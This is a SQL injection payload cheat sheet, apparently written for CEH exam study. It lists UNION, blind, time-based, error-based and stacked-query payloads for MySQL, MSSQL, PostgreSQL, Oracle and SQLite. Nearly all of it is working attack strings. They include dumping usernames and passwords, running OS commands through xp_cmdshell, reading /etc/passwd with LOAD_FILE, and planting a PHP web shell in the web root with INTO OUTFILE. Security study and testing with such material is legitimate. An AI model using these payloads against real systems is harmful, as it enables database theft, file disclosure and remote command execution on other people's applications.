UNION-Based
Replace `<N>` with the detected column count and place the fields to be extracted in positions that are displayed on the page. If the query exposes only a small number of columns, concatenate several values into one column:
GROUP_CONCAT(column)
MySQL/MariaDB
# Check context
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
# DB / User / Version
' UNION SELECT DATABASE(),USER(),VERSION()--
# List DBs/Tables/Columns
' UNION SELECT NULL,NULL,schema_name,NULL FROM information_schema.schemata--
' UNION SELECT table_schema,table_name,NULL FROM information_schema.tables--
' UNION SELECT table_schema,table_name,column_name FROM information_schema.columns--
# Dump example
' UNION SELECT username,password,NULL FROM app.users--
Microsoft SQL Server (MSSQL)
-- Find columns
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
-- DB / User / Version
' UNION SELECT DB_NAME(),SYSTEM_USER,@@VERSION--
-- Enumerate
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='Users'--
-- Old-school sysobjects/syscolumns
' UNION SELECT name,NULL,NULL FROM sysobjects WHERE xtype='U'-- -- 'U' = user table
' UNION SELECT c.name,NULL,NULL FROM syscolumns c JOIN sysobjects o ON c.id=o.id WHERE o.name='Users'--
PostgreSQL
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT current_database(),current_user,version()--
' UNION SELECT table_schema || '.' || table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
Oracle
' UNION SELECT NULL FROM dual--
' UNION SELECT 1,2 FROM dual-- -- Oracle requires FROM clause; use DUAL
' UNION SELECT SYS_CONTEXT(''USERENV'',''CURRENT_SCHEMA''), USER FROM dual--
' UNION SELECT banner FROM v$version--
' UNION SELECT owner||''.''||table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
SQLite
' UNION SELECT 1,2,3--
' UNION SELECT sqlite_version(),NULL,NULL--
' UNION SELECT name,NULL,NULL FROM sqlite_master WHERE type='table'--
' UNION SELECT sql,NULL,NULL FROM sqlite_master WHERE name='users'--
-- Columns via pragma (usually needs out-of-band or in-app echo):
PRAGMA table_info(users);
BOOLEAN-Based BLIND
Generic patterns
' AND 1=1--
' AND 1=2--
" AND 'a'='a" --
" AND 'a'='b" --
DB-specific truth tests
- MySQL: `' AND SLEEP(0)=0--` vs `' AND SLEEP(5)--` (time-based; see the next section)
- MSSQL: `' AND 1=(SELECT 1)--` / `' AND 1=(SELECT 2)--`
- PostgreSQL: `' AND 1=(SELECT 1)--`
- Oracle: `' AND 1=(SELECT 1 FROM dual)--`
Extracting bit-by-bit (concept)
' AND ASCII(SUBSTRING((SELECT DATABASE()),1,1)) > 77--
Time-Based BLIND
MySQL/MariaDB
' AND IF(1=1,SLEEP(5),0)--
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>77,SLEEP(5),0)--
MSSQL
' IF (1=1) WAITFOR DELAY '0:0:5'--
' IF (ASCII(SUBSTRING(DB_NAME(),1,1))>77) WAITFOR DELAY '0:0:5'--
PostgreSQL
' || pg_sleep(5)--
' AND CASE WHEN (1=1) THEN pg_sleep(5) ELSE 0 END--
Oracle
' AND CASE WHEN 1=1 THEN dbms_lock.sleep(5) ELSE 0 END--
ERROR-Based
MySQL
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT DATABASE()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
MSSQL
' AND 1=CONVERT(int, (SELECT DB_NAME()))-- -- type cast error leaks value
' UNION SELECT 1/0-- -- trigger error page with details
PostgreSQL
' AND CAST((SELECT current_database()) AS int)--
Oracle
' AND TO_NUMBER((SELECT banner FROM v$version WHERE ROWNUM=1))--
Error-based techniques work only when the application echoes database error messages back to the client; many production applications suppress them, which is one reason to keep detailed errors out of responses.
Stacked Queries (semicolon); Read/Write / OS Interaction
Only applicable when the database driver or API allows stacked statements (common with MSSQL, PostgreSQL and Oracle). Avoid illegal actions; these are shown for awareness only.
MSSQL (classic)
'; EXEC xp_cmdshell 'whoami'--
'; DECLARE @c VARCHAR(200)='whoami'; EXEC xp_cmdshell @c--
'; CREATE TABLE t(x INT); INSERT INTO t VALUES (1)--
PostgreSQL
'; CREATE TABLE pwn(x text); INSERT INTO pwn VALUES (current_user);--
-- With superuser + untrusted languages/extensions, RCE is possible (outside CEH scope).
Oracle
'; BEGIN EXECUTE IMMEDIATE 'CREATE TABLE T(X INT)'; END;--
-- DBMS_SCHEDULER/UTL_HTTP abuses exist under high-priv roles.
MySQL accessed through typical web application drivers usually disallows stacked queries; whether it does depends on the driver. Out-of-band techniques (DNS exfiltration, etc.) may be used instead.
MSSQL Legacy Enumeration (sysobjects/syscolumns)
-- List user tables
' UNION SELECT name,NULL,NULL FROM sysobjects WHERE xtype='U'--
-- List columns in a table
' UNION SELECT c.name,NULL,NULL
FROM syscolumns c
JOIN sysobjects o ON c.id=o.id
WHERE o.name='Users'--
-- Your snippet (xtype=CHAR(85) = 'U'):
UNION SELECT ALL name FROM sysobjects WHERE xtype=CHAR(85)
MySQL Privilege & File Tricks
-- Current file privs
' UNION SELECT @@secure_file_priv,NULL,NULL--
-- Read local file (if FILE privilege and path allowed)
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--
-- Write webshell (very restricted in modern setups)
' UNION SELECT "<?php system($_GET[1]); ?>",NULL,NULL INTO OUTFILE '/var/www/html/s.php'--
Most modern servers block these through file-system permissions, AppArmor or SELinux; CEH expects you to know the primitives, not necessarily to use them in live exams.
PostgreSQL / Oracle Catalog Nuggets
PostgreSQL
-- All DBs
' UNION SELECT datname,NULL,NULL FROM pg_database--
-- All tables in current schema(s)
' UNION SELECT schemaname||'.'||tablename,NULL,NULL FROM pg_tables--
Oracle
-- Users
' UNION SELECT username FROM all_users--
-- Tables you can see
' UNION SELECT owner||'.'||table_name FROM all_tables--
-- Columns
' UNION SELECT owner||'.'||table_name||':'||column_name FROM all_tab_columns--
Context-Specific UNION
Replace X..N with the column positions that render on the page.
2 Columns
' UNION SELECT 1,2--
' UNION SELECT @@version,2-- -- MSSQL example
3 Columns
' UNION SELECT 1,2,3--
' UNION SELECT DATABASE(),USER(),VERSION()-- -- MySQL example
5 Columns
' UNION SELECT 1,2,3,4,5--
' UNION SELECT 1,2,table_name,4,5 FROM information_schema.tables--
BLIND Extraction
Extract Nth char of string (MySQL)
' AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables LIMIT 0,1),1,1))>77--
Binary search speedup (MySQL pseudo)
' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1)) BETWEEN 78 AND 90,SLEEP(2),0)--
MSSQL version char test
' IF (ASCII(SUBSTRING(CONVERT(varchar,@@version),1,1))>77) WAITFOR DELAY '0:0:3'--